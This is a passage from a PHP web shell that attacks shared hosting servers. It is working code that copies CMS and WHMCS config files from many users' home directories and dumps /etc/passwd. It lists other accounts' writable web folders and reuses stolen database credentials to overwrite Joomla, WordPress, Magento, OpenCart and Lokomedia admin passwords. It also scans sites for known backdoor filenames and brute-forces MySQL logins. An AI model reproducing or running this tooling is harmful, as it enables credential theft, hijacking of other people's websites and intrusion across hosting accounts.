  1132. "/home2/$user_cox/public_html/wordpress/wp-config.php" => "WordPressWordpress",
  1133. "/home2/$user_cox/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
  1134. "/home2/$user_cox/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",
  1135. "/home2/$user_cox/public_html/Home/wp-config.php" => "WordPressHome",
  1136. "/home2/$user_cox/public_html/HOME/wp-config.php" => "WordPressHome",
  1137. "/home2/$user_cox/public_html/home/wp-config.php" => "WordPressHome",
  1138. "/home2/$user_cox/public_html/NEW/wp-config.php" => "WordPressNew",
  1139. "/home2/$user_cox/public_html/New/wp-config.php" => "WordPressNew",
  1140. "/home2/$user_cox/public_html/new/wp-config.php" => "WordPressNew",
  1141. "/home2/$user_cox/public_html/News/wp-config.php" => "WordPressNews",
  1142. "/home2/$user_cox/public_html/NEWS/wp-config.php" => "WordPressNews",
  1143. "/home2/$user_cox/public_html/news/wp-config.php" => "WordPressNews",
  1144. "/home2/$user_cox/public_html/Cms/wp-config.php" => "WordPressCms",
  1145. "/home2/$user_cox/public_html/CMS/wp-config.php" => "WordPressCms",
  1146. "/home2/$user_cox/public_html/cms/wp-config.php" => "WordPressCms",
  1147. "/home2/$user_cox/public_html/Main/wp-config.php" => "WordPressMain",
  1148. "/home2/$user_cox/public_html/MAIN/wp-config.php" => "WordPressMain",
  1149. "/home2/$user_cox/public_html/main/wp-config.php" => "WordPressMain",
  1150. "/home2/$user_cox/public_html/Blog/wp-config.php" => "WordPressBlog",
  1151. "/home2/$user_cox/public_html/BLOG/wp-config.php" => "WordPressBlog",
  1152. "/home2/$user_cox/public_html/blog/wp-config.php" => "WordPressBlog",
  1153. "/home2/$user_cox/public_html/Blogs/wp-config.php" => "WordPressBlogs",
  1154. "/home2/$user_cox/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
  1155. "/home2/$user_cox/public_html/blogs/wp-config.php" => "WordPressBlogs",
  1156. "/home2/$user_cox/public_html/beta/wp-config.php" => "WordPressBeta",
  1157. "/home2/$user_cox/public_html/Beta/wp-config.php" => "WordPressBeta",
  1158. "/home2/$user_cox/public_html/BETA/wp-config.php" => "WordPressBeta",
  1159. "/home2/$user_cox/public_html/PRESS/wp-config.php" => "WordPressPress",
  1160. "/home2/$user_cox/public_html/Press/wp-config.php" => "WordPressPress",
  1161. "/home2/$user_cox/public_html/press/wp-config.php" => "WordPressPress",
  1162. "/home2/$user_cox/public_html/Wp/wp-config.php" => "WordPressWp",
  1163. "/home2/$user_cox/public_html/wp/wp-config.php" => "WordPressWp",
  1164. "/home2/$user_cox/public_html/WP/wp-config.php" => "WordPressWP",
  1165. "/home2/$user_cox/public_html/portal/wp-config.php" => "WordPressPortal",
  1166. "/home2/$user_cox/public_html/PORTAL/wp-config.php" => "WordPressPortal",
  1167. "/home2/$user_cox/public_html/Portal/wp-config.php" => "WordPressPortal",
  1168. "/home3/$user_cox/.my.cnf" => "cpanel",
  1169. "/home3/$user_cox/.accesshash" => "WHM-accesshash",
  1170. "/home3/$user_cox/public_html/bw-configs/config.ini" => "BosWeb",
  1171. "/home3/$user_cox/public_html/config/koneksi.php" => "Lokomedia",
  1172. "/home3/$user_cox/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  1173. "/home3/$user_cox/public_html/clientarea/configuration.php" => "WHMCS",
  1174. "/home3/$user_cox/public_html/whmcs/configuration.php" => "WHMCS",
  1175. "/home3/$user_cox/public_html/forum/config.php" => "phpBB",
  1176. "/home3/$user_cox/public_html/sites/default/settings.php" => "Drupal",
  1177. "/home3/$user_cox/public_html/config/settings.inc.php" => "PrestaShop",
  1178. "/home3/$user_cox/public_html/app/etc/local.xml" => "Magento",
  1179. "/home3/$user_cox/public_html/admin/config.php" => "OpenCart",
  1180. "/home3/$user_cox/public_html/slconfig.php" => "Sitelok",
  1181. "/home3/$user_cox/public_html/application/config/database.php" => "Ellislab",
  1182. "/home3/$user_cox/public_html/whm/configuration.php" => "WHMCS",
  1183. "/home3/$user_cox/public_html/whmc/WHM/configuration.ph" => "WHMC",
  1184. "/home3/$user_cox/public_html/central/configuration.php" => "WHM Central",
  1185. "/home3/$user_cox/public_html/whm/WHMCS/configuration.php" => "WHMCS",
  1186. "/home3/$user_cox/public_html/whm/whmcs/configuration.php" => "WHMCS",
  1187. "/home3/$user_cox/public_html/submitticket.php" => "WHMCS",
  1188. "/home3/$user_cox/public_html/configuration.php" => "Joomla",
  1189. "/home3/$user_cox/public_html/Joomla/configuration.php" => "JoomlaJoomla",
  1190. "/home3/$user_cox/public_html/joomla/configuration.php" => "JoomlaJoomla",
  1191. "/home3/$user_cox/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",
  1192. "/home3/$user_cox/public_html/Home/configuration.php" => "JoomlaHome",
  1193. "/home3/$user_cox/public_html/HOME/configuration.php" => "JoomlaHome",
  1194. "/home3/$user_cox/public_html/home/configuration.php" => "JoomlaHome",
  1195. "/home3/$user_cox/public_html/NEW/configuration.php" => "JoomlaNew",
  1196. "/home3/$user_cox/public_html/New/configuration.php" => "JoomlaNew",
  1197. "/home3/$user_cox/public_html/new/configuration.php" => "JoomlaNew",
  1198. "/home3/$user_cox/public_html/News/configuration.php" => "JoomlaNews",
  1199. "/home3/$user_cox/public_html/NEWS/configuration.php" => "JoomlaNews",
  1200. "/home3/$user_cox/public_html/news/configuration.php" => "JoomlaNews",
  1201. "/home3/$user_cox/public_html/Cms/configuration.php" => "JoomlaCms",
  1202. "/home3/$user_cox/public_html/CMS/configuration.php" => "JoomlaCms",
  1203. "/home3/$user_cox/public_html/cms/configuration.php" => "JoomlaCms",
  1204. "/home3/$user_cox/public_html/Main/configuration.php" => "JoomlaMain",
  1205. "/home3/$user_cox/public_html/MAIN/configuration.php" => "JoomlaMain",
  1206. "/home3/$user_cox/public_html/main/configuration.php" => "JoomlaMain",
  1207. "/home3/$user_cox/public_html/Blog/configuration.php" => "JoomlaBlog",
  1208. "/home3/$user_cox/public_html/BLOG/configuration.php" => "JoomlaBlog",
  1209. "/home3/$user_cox/public_html/blog/configuration.php" => "JoomlaBlog",
  1210. "/home3/$user_cox/public_html/Blogs/configuration.php" => "JoomlaBlogs",
  1211. "/home3/$user_cox/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
  1212. "/home3/$user_cox/public_html/blogs/configuration.php" => "JoomlaBlogs",
  1213. "/home3/$user_cox/public_html/beta/configuration.php" => "JoomlaBeta",
  1214. "/home3/$user_cox/public_html/Beta/configuration.php" => "JoomlaBeta",
  1215. "/home3/$user_cox/public_html/BETA/configuration.php" => "JoomlaBeta",
  1216. "/home3/$user_cox/public_html/PRESS/configuration.php" => "JoomlaPress",
  1217. "/home3/$user_cox/public_html/Press/configuration.php" => "JoomlaPress",
  1218. "/home3/$user_cox/public_html/press/configuration.php" => "JoomlaPress",
  1219. "/home3/$user_cox/public_html/Wp/configuration.php" => "JoomlaWp",
  1220. "/home3/$user_cox/public_html/wp/configuration.php" => "JoomlaWp",
  1221. "/home3/$user_cox/public_html/WP/configuration.php" => "JoomlaWP",
  1222. "/home3/$user_cox/public_html/portal/configuration.php" => "JoomlaPortal",
  1223. "/home3/$user_cox/public_html/PORTAL/configuration.php" => "JoomlaPortal",
  1224. "/home3/$user_cox/public_html/Portal/configuration.php" => "JoomlaPortal",
  1225. "/home3/$user_cox/public_html/wp-config.php" => "WordPress",
  1226. "/home3/$user_cox/public_html/wordpress/wp-config.php" => "WordPressWordpress",
  1227. "/home3/$user_cox/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
  1228. "/home3/$user_cox/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",
  1229. "/home3/$user_cox/public_html/Home/wp-config.php" => "WordPressHome",
  1230. "/home3/$user_cox/public_html/HOME/wp-config.php" => "WordPressHome",
  1231. "/home3/$user_cox/public_html/home/wp-config.php" => "WordPressHome",
  1232. "/home3/$user_cox/public_html/NEW/wp-config.php" => "WordPressNew",
  1233. "/home3/$user_cox/public_html/New/wp-config.php" => "WordPressNew",
  1234. "/home3/$user_cox/public_html/new/wp-config.php" => "WordPressNew",
  1235. "/home3/$user_cox/public_html/News/wp-config.php" => "WordPressNews",
  1236. "/home3/$user_cox/public_html/NEWS/wp-config.php" => "WordPressNews",
  1237. "/home3/$user_cox/public_html/news/wp-config.php" => "WordPressNews",
  1238. "/home3/$user_cox/public_html/Cms/wp-config.php" => "WordPressCms",
  1239. "/home3/$user_cox/public_html/CMS/wp-config.php" => "WordPressCms",
  1240. "/home3/$user_cox/public_html/cms/wp-config.php" => "WordPressCms",
  1241. "/home3/$user_cox/public_html/Main/wp-config.php" => "WordPressMain",
  1242. "/home3/$user_cox/public_html/MAIN/wp-config.php" => "WordPressMain",
  1243. "/home3/$user_cox/public_html/main/wp-config.php" => "WordPressMain",
  1244. "/home3/$user_cox/public_html/Blog/wp-config.php" => "WordPressBlog",
  1245. "/home3/$user_cox/public_html/BLOG/wp-config.php" => "WordPressBlog",
  1246. "/home3/$user_cox/public_html/blog/wp-config.php" => "WordPressBlog",
  1247. "/home3/$user_cox/public_html/Blogs/wp-config.php" => "WordPressBlogs",
  1248. "/home3/$user_cox/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
  1249. "/home3/$user_cox/public_html/blogs/wp-config.php" => "WordPressBlogs",
  1250. "/home3/$user_cox/public_html/beta/wp-config.php" => "WordPressBeta",
  1251. "/home3/$user_cox/public_html/Beta/wp-config.php" => "WordPressBeta",
  1252. "/home3/$user_cox/public_html/BETA/wp-config.php" => "WordPressBeta",
  1253. "/home3/$user_cox/public_html/PRESS/wp-config.php" => "WordPressPress",
  1254. "/home3/$user_cox/public_html/Press/wp-config.php" => "WordPressPress",
  1255. "/home3/$user_cox/public_html/press/wp-config.php" => "WordPressPress",
  1256. "/home3/$user_cox/public_html/Wp/wp-config.php" => "WordPressWp",
  1257. "/home3/$user_cox/public_html/wp/wp-config.php" => "WordPressWp",
  1258. "/home3/$user_cox/public_html/WP/wp-config.php" => "WordPressWP",
  1259. "/home3/$user_cox/public_html/portal/wp-config.php" => "WordPressPortal",
  1260. "/home3/$user_cox/public_html/PORTAL/wp-config.php" => "WordPressPortal",
  1261. "/home3/$user_cox/public_html/Portal/wp-config.php" => "WordPressPortal"
  1262. );
  1263. foreach($grab_config as $config => $nama_config) {
  1264. $ambil_config = file_get_contents($config);
  1265. if($ambil_config == '') {
  1266. } else {
  1267. $file_config = fopen("cox_config/$user_cox-$nama_config.txt","w");
  1268. fputs($file_config,$ambil_config);
  1269. }
  1270. }
  1271. }
  1272. }
  1273. echo "<center><a href='?dir=$dir/cox_config'><font color=#4B0082>Done</font></a></center>";
  1274. }else{
  1275.  
  1276. echo "<form method=\"post\" action=\"\"><center>etc/passw ( Error ? <a href='?dir=$dir&do=passwbypass'>Bypass Here</a> )<br><textarea name=\"passwd\" class='area' rows='15' cols='60'>\n";
  1277. echo file_get_contents('/etc/passwd');
  1278. echo "</textarea><br><input type=\"submit\" value=\"GassPoll\"></td></tr></center>\n";
  1279. }
  1280. } elseif($_GET['do'] == 'jumping') {
  1281. $i = 0;
  1282. echo "<pre><div class='margin: 5px auto;'>";
  1283. $etc = fopen("/etc/passwd", "r");
  1284. while($passwd = fgets($etc)) {
  1285. if($passwd == '' || !$etc) {
  1286. echo "<font color=red>Can't read /etc/passwd</font>";
  1287. } else {
  1288. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  1289. foreach($user_jumping[1] as $user_idx_jump) {
  1290. $user_jumping_dir = "/home/$user_idx_jump/public_html";
  1291. if(is_readable($user_jumping_dir)) {
  1292. $i++;
  1293. $jrw = "[<font color=#4B0082>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a><br>";
  1294. if(is_writable($user_jumping_dir)) {
  1295. $jrw = "[<font color=#4B0082>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a><br>";
  1296. }
  1297. echo $jrw;
  1298. $domain_jump = file_get_contents("/etc/named.conf");
  1299. if($domain_jump == '') {
  1300. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  1301. } else {
  1302. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  1303. foreach($domains_jump[1] as $dj) {
  1304. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  1305. $user_jumping_url = $user_jumping_url['name'];
  1306. if($user_jumping_url == $user_idx_jump) {
  1307. echo " => ( <u>$dj</u> )<br>";
  1308. break;
  1309. }
  1310. }
  1311. }
  1312. }
  1313. }
  1314. }
  1315. }
  1316. if($i == 0) {
  1317. } else {
  1318. echo "<br>Total ada ".$i." Kimcil di ".gethostbyname($_SERVER['HTTP_HOST'])."";
  1319. }
  1320. echo "</div></pre>";
  1321. } elseif($_GET['do'] == 'auto_edit_user') {
  1322. if($_POST['hajar']) {
  1323. if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  1324. echo "username atau password harus lebih dari 6 karakter";
  1325. } else {
  1326. $user_baru = $_POST['user_baru'];
  1327. $pass_baru = md5($_POST['pass_baru']);
  1328. $conf = $_POST['config_dir'];
  1329. $scan_conf = scandir($conf);
  1330. foreach($scan_conf as $file_conf) {
  1331. if(!is_file("$conf/$file_conf")) continue;
  1332. $config = file_get_contents("$conf/$file_conf");
  1333. if(preg_match("/JConfig|joomla/",$config)) {
  1334. $dbhost = ambilkata($config,"host = '","'");
  1335. $dbuser = ambilkata($config,"user = '","'");
  1336. $dbpass = ambilkata($config,"password = '","'");
  1337. $dbname = ambilkata($config,"db = '","'");
  1338. $dbprefix = ambilkata($config,"dbprefix = '","'");
  1339. $prefix = $dbprefix."users";
  1340. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1341. $db = mysql_select_db($dbname);
  1342. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1343. $result = mysql_fetch_array($q);
  1344. $id = $result['id'];
  1345. $site = ambilkata($config,"sitename = '","'");
  1346. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  1347. echo "Config => ".$file_conf."<br>";
  1348. echo "CMS => Joomla<br>";
  1349. if($site == '') {
  1350. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1351. } else {
  1352. echo "Sitename => $site<br>";
  1353. }
  1354. if(!$update OR !$conn OR !$db) {
  1355. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1356. } else {
  1357. echo "Status => <font color=#4B0082>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1358. }
  1359. mysql_close($conn);
  1360. } elseif(preg_match("/WordPress/",$config)) {
  1361. $dbhost = ambilkata($config,"DB_HOST', '","'");
  1362. $dbuser = ambilkata($config,"DB_USER', '","'");
  1363. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1364. $dbname = ambilkata($config,"DB_NAME', '","'");
  1365. $dbprefix = ambilkata($config,"table_prefix = '","'");
  1366. $prefix = $dbprefix."users";
  1367. $option = $dbprefix."options";
  1368. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1369. $db = mysql_select_db($dbname);
  1370. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1371. $result = mysql_fetch_array($q);
  1372. $id = $result[ID];
  1373. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1374. $result2 = mysql_fetch_array($q2);
  1375. $target = $result2[option_value];
  1376. if($target == '') {
  1377. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1378. } else {
  1379. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  1380. }
  1381. $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  1382. echo "Config => ".$file_conf."<br>";
  1383. echo "CMS => Wordpress<br>";
  1384. echo $url_target;
  1385. if(!$update OR !$conn OR !$db) {
  1386. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1387. } else {
  1388. echo "Status => <font color=#4B0082>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1389. }
  1390. mysql_close($conn);
  1391. } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  1392. $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  1393. $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  1394. $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  1395. $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  1396. $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  1397. $prefix = $dbprefix."admin_user";
  1398. $option = $dbprefix."core_config_data";
  1399. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1400. $db = mysql_select_db($dbname);
  1401. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  1402. $result = mysql_fetch_array($q);
  1403. $id = $result[user_id];
  1404. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  1405. $result2 = mysql_fetch_array($q2);
  1406. $target = $result2[value];
  1407. if($target == '') {
  1408. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1409. } else {
  1410. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  1411. }
  1412. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  1413. echo "Config => ".$file_conf."<br>";
  1414. echo "CMS => Magento<br>";
  1415. echo $url_target;
  1416. if(!$update OR !$conn OR !$db) {
  1417. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1418. } else {
  1419. echo "Status => <font color=#4B0082>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1420. }
  1421. mysql_close($conn);
  1422. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  1423. $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  1424. $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  1425. $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  1426. $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  1427. $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  1428. $prefix = $dbprefix."user";
  1429. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1430. $db = mysql_select_db($dbname);
  1431. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  1432. $result = mysql_fetch_array($q);
  1433. $id = $result[user_id];
  1434. $target = ambilkata($config,"HTTP_SERVER', '","'");
  1435. if($target == '') {
  1436. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1437. } else {
  1438. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  1439. }
  1440. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  1441. echo "Config => ".$file_conf."<br>";
  1442. echo "CMS => OpenCart<br>";
  1443. echo $url_target;
  1444. if(!$update OR !$conn OR !$db) {
  1445. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1446. } else {
  1447. echo "Status => <font color=#4B0082>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1448. }
  1449. mysql_close($conn);
  1450. } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  1451. $dbhost = ambilkata($config,'server = "','"');
  1452. $dbuser = ambilkata($config,'username = "','"');
  1453. $dbpass = ambilkata($config,'password = "','"');
  1454. $dbname = ambilkata($config,'database = "','"');
  1455. $prefix = "users";
  1456. $option = "identitas";
  1457. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1458. $db = mysql_select_db($dbname);
  1459. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  1460. $result = mysql_fetch_array($q);
  1461. $target = $result[alamat_website];
  1462. if($target == '') {
  1463. $target2 = $result[url];
  1464. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1465. if($target2 == '') {
  1466. $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1467. } else {
  1468. $cek_login3 = file_get_contents("$target2/adminweb/");
  1469. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  1470. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  1471. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  1472. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  1473. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  1474. } else {
  1475. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  1476. }
  1477. }
  1478. } else {
  1479. $cek_login = file_get_contents("$target/adminweb/");
  1480. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  1481. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  1482. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  1483. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  1484. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  1485. } else {
  1486. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  1487. }
  1488. }
  1489. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  1490. echo "Config => ".$file_conf."<br>";
  1491. echo "CMS => Lokomedia<br>";
  1492. if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  1493. echo $url_target2;
  1494. } else {
  1495. echo $url_target;
  1496. }
  1497. if(!$update OR !$conn OR !$db) {
  1498. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1499. } else {
  1500. echo "Status => <font color=#4B0082>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1501. }
  1502. mysql_close($conn);
  1503. }
  1504. }
  1505. }
  1506. } else {
  1507. echo "<center>
  1508. <h1>Auto Edit User Config</h1>
  1509. <form method='post'>
  1510. DIR Config: <br>
  1511. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  1512. Set User & Pass: <br>
  1513. <input type='text' name='user_baru' value='Mr.Klimis' placeholder='user_baru'><br>
  1514. <input type='text' name='pass_baru' value='Mr.Klimis' placeholder='pass_baru'><br>
  1515. <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
  1516. </form>
  1517. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  1518. ";
  1519. }
  1520. }elseif($_GET['do'] == 'shelscan') {
  1521. echo'<center><h2>Shell Finder</h2>
  1522. <form action="" method="post">
  1523. <input type="text" size="50" name="traget" value="http://www.site.com/"/>
  1524. <br>
  1525. <input name="scan" value="Start Scaning" style="width: 215px;" type="submit">
  1526. </form><br>';
  1527. if (isset($_POST["scan"])) {
  1528. $url = $_POST['traget'];
  1529. echo "<br /><span class='start'>Scanning ".$url."<br /><br /></span>";
  1530. echo "Result :<br />";
  1531. $shells = array("WSO.php","dz.php","cpanel.php","cpn.php","sql.php","mysql.php","madspot.php","cp.php","cpbt.php","sYm.php",
  1532. "x.php","r99.php","lol.php","jo.php","wp.php","whmcs.php","shellz.php","d0main.php","d0mains.php","users.php",
  1533. "Cgishell.pl","killer.php","changeall.php","2.php","Sh3ll.php","dz0.php","dam.php","user.php","dom.php","whmcs.php",
  1534. "vb.zip","r00t.php","c99.php","gaza.php","1.php","wp.zip"."wp-content/plugins/disqus-comment-system/disqus.php",
  1535. "d0mains.php","wp-content/plugins/akismet/akismet.php","madspotshell.php","Sym.php","c22.php","c100.php",
  1536. "wp-content/plugins/akismet/admin.php#","wp-content/plugins/google-sitemap-generator/sitemap-core.php#",
  1537. "wp-content/plugins/akismet/widget.php#","Cpanel.php","zone-h.php","tmp/user.php","tmp/Sym.php","cp.php",
  1538. "tmp/madspotshell.php","tmp/root.php","tmp/whmcs.php","tmp/index.php","tmp/2.php","tmp/dz.php","tmp/cpn.php",
  1539. "tmp/changeall.php","tmp/Cgishell.pl","tmp/sql.php","tmp/admin.php","cliente/downloads/h4xor.php",
  1540. "whmcs/downloads/dz.php","L3b.php","d.php","tmp/d.php","tmp/L3b.php","wp-content/plugins/akismet/admin.php",
  1541. "templates/rhuk_milkyway/index.php","templates/beez/index.php","admin1.php","upload.php","up.php","vb.zip","vb.rar",
  1542. "admin2.asp","uploads.php","sa.php","sysadmins/","admin1/","administration/Sym.php","images/Sym.php",
  1543. "/r57.php","/wp-content/plugins/disqus-comment-system/disqus.php","/shell.php","/sa.php","/admin.php",
  1544. "/sa2.php","/2.php","/gaza.php","/up.php","/upload.php","/uploads.php","/templates/beez/index.php","shell.php","/amad.php",
  1545. "/t00.php","/dz.php","/site.rar","/Black.php","/site.tar.gz","/home.zip","/home.rar","/home.tar","/home.tar.gz",
  1546. "/forum.zip","/forum.rar","/forum.tar","/forum.tar.gz","/test.txt","/ftp.txt","/user.txt","/site.txt","/error_log","/error",
  1547. "/cpanel","/awstats","/site.sql","/vb.sql","/forum.sql","/backup.sql","/back.sql","/data.sql","wp.rar/",
  1548. "wp-content/plugins/disqus-comment-system/disqus.php","asp.aspx","/templates/beez/index.php","tmp/vaga.php",
  1549. "tmp/killer.php","whmcs.php","tmp/killer.php","tmp/domaine.pl","tmp/domaine.php","useradmin/",
  1550. "tmp/d0maine.php","d0maine.php","tmp/sql.php","tmp/dz1.php","dz1.php","forum.zip","Symlink.php","Symlink.pl",
  1551. "forum.rar","joomla.zip","joomla.rar","wp.php","buck.sql","sysadmin.php","images/c99.php", "xd.php", "c100.php",
  1552. "spy.aspx","xd.php","tmp/xd.php","sym/root/home/","billing/killer.php","tmp/upload.php","tmp/admin.php",
  1553. "Server.php","tmp/uploads.php","tmp/up.php","Server/","wp-admin/c99.php","tmp/priv8.php","priv8.php","cgi.pl/",
  1554. "tmp/cgi.pl","downloads/dom.php","templates/ja-helio-farsi/index.php","webadmin.html","admins.php",
  1555. "/wp-content/plugins/count-per-day/js/yc/d00.php", "admins/","admins.asp","admins.php","wp.zip","wso2.5.1","pasir.php","pasir2.php","up.php","cok.php","newfile.php","upl.php",".php","a.php","crot.php","kontol.php","hmei7.php","jembut.php","memek.php","tai.php","rabit.php","indoxploit.php","a.php","hemb.php","hack.php","galau.php","HsH.php","indoXploit.php","asu.php","wso.php","lol.php","idx.php","rabbit.php","1n73ction.php","k.php","mailer.php","mail.php","temp.php","c.php","d.php","IDB.php","indo.php","indonesia.php","semvak.php","ndasmu.php","cox.php","as.php","ad.php","aa.php","file.php","peju.php","asd.php","configs.php","ass.php","z.php");
  1556. foreach ($shells as $shell){
  1557. $headers = get_headers("$url$shell"); //
  1558. if (eregi('200', $headers[0])) {
  1559. echo "<a href='$url$shell'>$url$shell</a> <span class='found'>Done :D</span><br /><br/><br/>"; //
  1560. $dz = fopen('shells.txt', 'a+');
  1561. $suck = "$url$shell";
  1562. fwrite($dz, $suck."\n");
  1563. }
  1564. }
  1565. echo "Shell [ <a href='./shells.txt' target='_blank'>shells.txt</a> ]</span>";
  1566. }
  1567.  
  1568. }
  1569. elseif($_GET['do'] == 'cpanel') {
  1570. if($_POST['crack']) {
  1571. $usercp = explode("\r\n", $_POST['user_cp']);
  1572. $passcp = explode("\r\n", $_POST['pass_cp']);
  1573. $i = 0;
  1574. foreach($usercp as $ucp) {
  1575. foreach($passcp as $pcp) {
  1576. if(@mysql_connect('localhost', $ucp, $pcp)) {
  1577. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  1578. } else {
  1579. $_SESSION[$ucp] = "1";
  1580. $_SESSION[$pcp] = "1";
  1581. $i++;
  1582. echo "username (<font color=#4B0082>$ucp</font>) password (<font color=#4B0082>$pcp</font>)<br>";
  1583. }
  1584. }
  1585. }
  1586. }
  1587. if($i == 0) {
  1588. } else {
  1589. echo "<br>Nemu ".$i." Cpanel by <font color=#4B0082>Mr.Klimis</font>";
  1590. }
  1591. } else {
  1592. echo "<center>
  1593. <form method='post'>
  1594. USER: <br>
  1595. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  1596. $_usercp = fopen("/etc/passwd","r");
  1597. while($getu = fgets($_usercp)) {
  1598. if($getu == '' || !$_usercp) {
  1599. echo "<font color=red>Can't read /etc/passwd</font>";
  1600. } else {
  1601. preg_match_all("/(.*?):x:/", $getu, $u);
  1602. foreach($u[1] as $user_cp) {
  1603. if(is_dir("/home/$user_cp/public_html")) {
  1604. echo "$user_cp\n";
  1605. }
  1606. }
  1607. }
  1608. }
  1609. echo "</textarea><br>
  1610. PASS: <br>
  1611. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  1612. function cp_pass($dir) {
  1613. $pass = "";
  1614. $dira = scandir($dir);
  1615. foreach($dira as $dirb) {
  1616. if(!is_file("$dir/$dirb")) continue;
  1617. $ambil = file_get_contents("$dir/$dirb");
  1618. if(preg_match("/WordPress/", $ambil)) {
  1619. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  1620. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  1621. $pass .= ambilkata($ambil,"password = '","'")."\n";
  1622. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  1623. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
